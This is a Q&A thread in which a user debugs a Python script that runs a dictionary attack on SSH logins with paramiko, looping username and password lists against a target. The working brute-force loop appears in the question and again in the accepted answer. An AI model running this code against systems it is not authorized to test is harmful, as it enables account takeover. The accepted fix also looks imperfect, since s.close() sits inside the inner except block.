# Python script seems to be hanging

Tags: python, ssh, python-2.x

I have an SSH server that I've been testing a script that performs dictionary based attacks against. Generally, I use a single username:password combination file and loop through it, but recently I decided to modify my hobby script to allow for separate username and password combinations. I figured it would be a simple nested loop (I chose to store the passwords in a list instead of a file which I use for the usernames). Unfortunately, adding that second loop seems to have caused the program to hang for some reason that I just can't pinpoint. I feel like I'm missing something incredibly obvious here. The program execute fine and works as expected but it never seems to actually return...the script just hangs after finding the correct combination and never exits properly...I have to terminate it manually. The offending block is below...this is part of a larger method inside of a class I call from my primary script. The method is called and then the main script just exits so there's nothing there that would be causing this.

```
with open(self.pwds) as p:
    pwords = p.read().splitlines()
    try:
        format_text = colored('WARNING', 'yellow', attrs=['underline'])
    except:
        format_text = "WARNING"
    print (format_text, "warning_message")
    with open(self.words) as w:
        for line in w:
            line = line.replace("\n", "")
            user = line
            for x in pwords:
                passw = x
                print ("Trying: ", user, ":", passw)
                s = paramiko.SSHClient()
                s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                try:
                    s.connect(self.target, username=user, password=passw, timeout=3)
                except paramiko.ssh_exception.AuthenticationException:
                    try:
                        format_text = colored('FAILED', 'red')
                    except:
                        format_text = 'FAILED'
                        print (format_text)
                else:
                    print ("SUCCESS!")
                    s.close()
                    return;
```

Comment: The only scenario that I see in which the only return statement that we see wouldn't be executed is if `self.words` or `self.pwds` points to an empty file.

Comment: They don't and never do. I'm really scratching my head over it especially as it executes perfectly fine and finishes gracefully without the internal for loop.

Comment: Try using pdb. This question unfortunately doesn't have enough information for us to be able to answer it.

Comment: Is it possible that `s.close()` is hanging? It seems unlikely, but it could be a bug in Paramiko

Comment: Is the timeout parameter in seconds or minutes or what? Did you make sure that it's not timing out? Could `s.connect(…)` be hanging? I don't see why `s.close()` would ever hang.

Comment: Apparently, after a bit of research it's an unusual, but not unheard of, problem that Paramiko might not close connections properly. A quick check of running processes shows that Python is left hanging and never finishes properly for some reason. PDB didn't find anything unusual to my eye...it showed that my script was exiting as expected but the clean up work done after seems to hang everything. The odd part of all this is that the internal loop is what made the difference...if I remove it, the script functions as expected. Timeout is in seconds, btw

Answer (score 0):

Thank you everyone for the attempts at solving this problem. I found the answer. I needed to close the SSH connection even on fail as indicated below.

```
                try:
                    s.connect(self.target, username=user, password=passw, timeout=3)
                except paramiko.ssh_exception.AuthenticationException:
                    try:
                        format_text = colored('FAILED', 'red')
                    except:
                        format_text = 'FAILED'
                        print (format_text)
                        s.close()
                else:
                    print ("SUCCESS!")
                    s.close()
                    return;
```